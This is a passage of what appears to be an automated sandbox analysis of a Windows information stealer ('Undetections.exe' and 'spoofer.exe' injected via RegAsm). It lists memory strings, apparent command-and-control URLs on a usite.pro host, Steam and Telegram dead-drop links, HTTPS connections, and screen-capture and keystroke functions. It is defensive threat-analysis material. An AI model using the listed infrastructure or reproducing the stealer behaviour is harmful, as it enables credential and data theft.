                          Source: spoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199662282318https://t.me/t8jmhlCristina
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: DGCAAFBF.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                          Source: spoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/t8jmhl
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/hwid.txt
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/hwid.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildLink.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildName.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txtt-kq
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txt
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txtd
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://universalbeure.usite.pro/STLprograms/NEW/z-Closing.txt
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: EHCBAAAF.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: EHCBAAAF.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: KKEHIEBKJKFIEBGDGDAAECGHDH.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.129.112:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.212.139:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00411BF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_00411BF0
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0F0FE2D8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0F0FE2D8

                          System Summary

                          barindex
                          .NET source code contains very large array initializations
                          Source: spoofer.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 209920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,4_2_69DD62C0
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EAC4200_2_04EAC420
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EAA6C00_2_04EAA6C0
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EA48980_2_04EA4898
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EAC4100_2_04EAC410
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EA06EC0_2_04EA06EC
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EAA6B10_2_04EAA6B1
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EA2CE80_2_04EA2CE8
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EA2CF80_2_04EA2CF8
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EABC820_2_04EABC82
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_04EABC900_2_04EABC90
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FB008E0_2_05FB008E
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDD6300_2_05FDD630
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDD6200_2_05FDD620
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_07943B500_2_07943B50
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_07943B400_2_07943B40
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0F0FF9780_2_0F0FF978
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0F0FC8810_2_0F0FC881
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DE2FD80_2_16DE2FD8
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DEBA510_2_16DEBA51
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DE22440_2_16DE2244
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DE76BB0_2_16DE76BB
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DEC7100_2_16DEC710
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DECBD80_2_16DECBD8
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16DE711B0_2_16DE711B
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_16E2C5A10_2_16E2C5A1
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FBDD080_2_05FBDD08
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeCode function: 2_2_012C0AE02_2_012C0AE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041D25A4_2_0041D25A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F3904_2_0041F390
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CD094_2_0041CD09
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041DE874_2_0041DE87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D6C9E04_2_69D6C9E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C849F04_2_69C849F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D109B04_2_69D109B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE09A04_2_69CE09A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0A9A04_2_69D0A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C889604_2_69C88960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA69004_2_69CA6900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D568E04_2_69D568E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D248404_2_69D24840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA08204_2_69CA0820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CDA8204_2_69CDA820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D56BE04_2_69D56BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CF0BA04_2_69CF0BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CCEA804_2_69CCEA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CCCA704_2_69CCCA70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CFEA004_2_69CFEA00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D08A304_2_69D08A30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DDCDC04_2_69DDCDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE6D904_2_69CE6D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C54DB04_2_69C54DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D7AD504_2_69D7AD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D1ED704_2_69D1ED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD8D204_2_69DD8D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C4ECC04_2_69C4ECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAECD04_2_69CAECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C5AC604_2_69C5AC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D16C004_2_69D16C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2AC304_2_69D2AC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2EFF04_2_69D2EFF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C50FE04_2_69C50FE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D98FB04_2_69D98FB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C5EFB04_2_69C5EFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CBEF404_2_69CBEF40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D12F704_2_69D12F70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C56F104_2_69C56F10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D90F204_2_69D90F20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C5AEC04_2_69C5AEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CF0EC04_2_69CF0EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD6E904_2_69CD6E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEEE704_2_69CEEE70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D30E204_2_69D30E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C501E04_2_69C501E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB81404_2_69CB8140
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D341304_2_69D34130
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CC61304_2_69CC6130
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C480904_2_69C48090
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2C0B04_2_69D2C0B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C600B04_2_69C600B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C9E0704_2_69C9E070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D180104_2_69D18010
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D1C0004_2_69D1C000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA43E04_2_69CA43E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C823A04_2_69C823A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAE3B04_2_69CAE3B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C583404_2_69C58340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D923704_2_69D92370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C523704_2_69C52370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D6C3604_2_69D6C360
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE63704_2_69CE6370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CC23204_2_69CC2320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD62C04_2_69DD62C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D1E2B04_2_69D1E2B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D222A04_2_69D222A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE82504_2_69CE8250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD82604_2_69CD8260
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D1A2104_2_69D1A210
